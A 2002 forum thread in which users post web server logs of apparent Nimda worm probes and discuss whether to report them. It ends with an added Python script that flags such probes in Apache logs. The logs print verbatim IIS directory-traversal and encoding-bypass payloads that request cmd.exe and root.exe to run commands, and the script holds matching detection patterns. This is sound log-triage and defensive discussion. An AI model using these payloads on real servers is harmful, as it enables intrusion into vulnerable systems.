Is this really a Nimda infection attempt? - Windows & Software
Marsh Posted on 07-05-2002 at 15:19:25
That's quite possible. Do a search; there has been at least one other thread on this recently.
Marsh Posted on 07-05-2002 at 15:27:33
193.252.2.7, and what do I do about this one? Do I notify Wanadoo or what?
Marsh Posted on 12-05-2002 at 21:14:31
So do I:
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2002-05-12 00:28:54 80.14.229.234 - 80.14.119.57 80 GET /scripts/root.exe /c+dir 401 -
2002-05-12 00:28:55 80.14.229.234 - 80.14.119.57 80 GET /MSADC/root.exe /c+dir 403 -
2002-05-12 00:28:56 80.14.229.234 - 80.14.119.57 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:28:57 80.14.229.234 - 80.14.119.57 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:28:58 80.14.229.234 - 80.14.119.57 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:28:59 80.14.229.234 - 80.14.119.57 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:29:01 80.14.229.234 - 80.14.119.57 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:29:02 80.14.229.234 - 80.14.119.57 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-05-12 00:29:03 80.14.229.234 - 80.14.119.57 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:29:04 80.14.229.234 - 80.14.119.57 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
etc.... So indeed, what do we do, notify Wanadoo???
--Message edited by Jef34 on 12-05-2002 at 21:14:52--
Marsh Posted on 12-05-2002 at 21:16:19
By the way, what should be done to avoid infection??? Apart from antivirus, etc...
--Message edited by Jef34 on 13-05-2002 at 09:31:31--
Marsh Posted on 13-05-2002 at 09:49:45
Do as I do: Apache + updates
Marsh Posted on 13-05-2002 at 15:52:32
benwar wrote: 193.252.2.7, and what do I do about this one? Do I notify Wanadoo or what?
The guy in question is infected. He's not a hacker! Let him know if you want to or can. No need to notify abuse...
Marsh Posted on 07-05-2002 at 15:18:13
In my Apache logs I have this:
193.252.2.7 - - [06/May/2002:19:53:07 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 319
193.252.2.7 - - [06/May/2002:19:53:11 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 317
193.252.2.7 - - [06/May/2002:19:53:14 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
193.252.2.7 - - [06/May/2002:19:53:14 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
193.252.2.7 - - [06/May/2002:19:53:15 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
193.252.2.7 - - [06/May/2002:19:53:15 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358
193.252.2.7 - - [06/May/2002:19:53:15 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358
193.252.2.7 - - [06/May/2002:19:53:16 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 374
193.252.2.7 - - [06/May/2002:19:53:16 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:19:53:16 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:19:54:02 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:19:54:12 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:20:19:02 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 319
193.252.2.7 - - [06/May/2002:20:19:02 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 317
193.252.2.7 - - [06/May/2002:20:19:03 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
193.252.2.7 - - [06/May/2002:20:19:03 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
193.252.2.7 - - [06/May/2002:20:19:04 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
193.252.2.7 - - [06/May/2002:20:19:05 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358
193.252.2.7 - - [06/May/2002:20:19:05 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358
193.252.2.7 - - [06/May/2002:20:19:06 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 374
193.252.2.7 - - [06/May/2002:20:19:06 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:20:19:06 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:20:19:07 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:20:19:07 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:20:19:08 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 324
193.252.2.7 - - [06/May/2002:20:19:08 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 324
193.252.2.7 - - [06/May/2002:20:19:09 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
193.252.2.7 - - [06/May/2002:20:19:09 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
Weird requests, aren't they?
---------------
I said to the left... François
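
Added example, not part of the original thread: a small triage script for Apache access logs like the one posted above. It flags requests for `cmd.exe`/`root.exe`, directory traversal, double percent-encoding (`%255c`) and overlong UTF-8 bytes (`%c0%af`), grouped by client IP. The function names and trait labels are hypothetical, and the sample lines are constructed with documentation-range addresses.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Apache common log format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) \S+$')
SHELL = re.compile(rb'(?:cmd|root)\.exe', re.I)
OVERLONG = re.compile(rb'[\xc0\xc1]')  # 0xC0/0xC1 never begin a valid UTF-8 sequence

# Constructed sample lines modelled on the thread's entries (documentation IPs).
SAMPLE = [
    '192.0.2.10 - - [06/May/2002:19:53:07 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 319',
    '192.0.2.10 - - [06/May/2002:19:53:15 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341',
    '192.0.2.10 - - [06/May/2002:19:54:02 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340',
    '192.0.2.20 - - [06/May/2002:19:55:00 +0200] "GET /index.html HTTP/1.0" 200 1024',
]

def fully_decode(data, max_rounds=5):
    """Percent-decode until stable, so %255c -> %5c -> backslash is seen."""
    for _ in range(max_rounds):
        data, prev = unquote_to_bytes(data), data
        if data == prev:
            break
    return data

def classify(target):
    """Return the probe traits found in one request target (path?query)."""
    once = unquote_to_bytes(target.split('?', 1)[0])  # one decoding pass
    final = fully_decode(once)
    checks = {
        'shell-binary': SHELL.search(final),
        'traversal': b'..\\' in final or b'../' in final,
        'double-encoded': once != final,
        'overlong-utf8': OVERLONG.search(once),
    }
    return {name for name, hit in checks.items() if hit}

def scan(lines):
    """Map client IP -> hit count, union of traits, and status codes returned."""
    report = defaultdict(lambda: {'hits': 0, 'traits': set(), 'statuses': set()})
    for line in lines:
        m = LOG_RE.match(line.strip())
        traits = classify(m.group(2)) if m else set()
        if traits:
            entry = report[m.group(1)]
            entry['hits'] += 1
            entry['traits'] |= traits
            entry['statuses'].add(int(m.group(3)))
    return dict(report)
```

Call `scan()` on the lines of an access log; a flagged client whose statuses are all 4xx was refused on every probe, while any 2xx among them is worth a closer look.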